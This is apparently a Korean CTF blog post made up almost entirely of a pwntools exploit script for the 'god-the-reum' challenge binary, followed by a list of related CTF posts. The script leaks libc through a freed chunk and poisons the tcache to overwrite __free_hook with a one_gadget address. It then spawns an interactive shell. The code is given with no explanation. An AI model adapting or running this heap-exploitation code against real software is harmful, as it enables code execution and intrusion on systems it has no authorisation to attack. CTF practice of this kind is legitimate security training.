728x90
펑펑펑펑펑
from pwn import *
s = process("./god-the-reum")
libc = ELF('./libc')
elf = ELF("./god-the-reum")
def create(number):
s.recvuntil(" : ")
s.sendline("1")
s.recvuntil("how much initial eth? : ")
s.sendline(str(number))
def deposit(index, deposit):
s.recvuntil(" : ")
s.sendline("2")
s.recvuntil("input wallet no : ")
s.sendline(str(index))
s.recvuntil("how much deposit? : ")
s.sendline(str(deposit))
def withdraw(index, withdraw):
s.recvuntil(" : ")
s.sendline("3")
s.recvuntil("input wallet no : ")
s.sendline(str(index))
s.recvuntil("how much you wanna withdraw? : ")
s.sendline(str(withdraw))
def show():
s.recvuntil(" : ")
s.sendline("4")
def quit():
s.recvuntil(" : ")
s.sendline("5")
def dev(index, content):
s.recvuntil(" : ")
s.sendline("6")
s.recvuntil("input wallet no : ")
s.sendline(str(index))
s.recvuntil("new eth : ")
s.sendline(content)
create(0x30)
create(0x1000)
create(0x1000)
withdraw(1,0x1000)
show()
s.recvuntil("ballance ")
s.recvuntil("ballance ")
leak = int(s.recv(15))
print "leak : " + hex(leak)
libc_base = leak - 0x3ebca0
print "libc_base : " + hex(libc_base)
one_shot = libc_base + 0x10a38c
print "one_shot : " + hex(one_shot)
free_hook = libc_base + libc.symbols['__free_hook']
print "free_hook : " + hex(free_hook)
withdraw(0,0x30)
dev(0,p64(free_hook))
create(0x30)
create(0x30)
dev(4,p64(one_shot))
withdraw(0,48)
s.interactive()
'PWN > CTF' 카테고리의 다른 글
| [Asis 2015] math sequence (0) | 2019.02.15 |
|---|---|
| [Asis 2016] b00ks (0) | 2019.02.06 |
| [codegate 2018] marimo (0) | 2019.01.24 |
| [mma_2016] greeting (0) | 2019.01.18 |
| [PCTF 2015] prodmanager (0) | 2019.01.05 |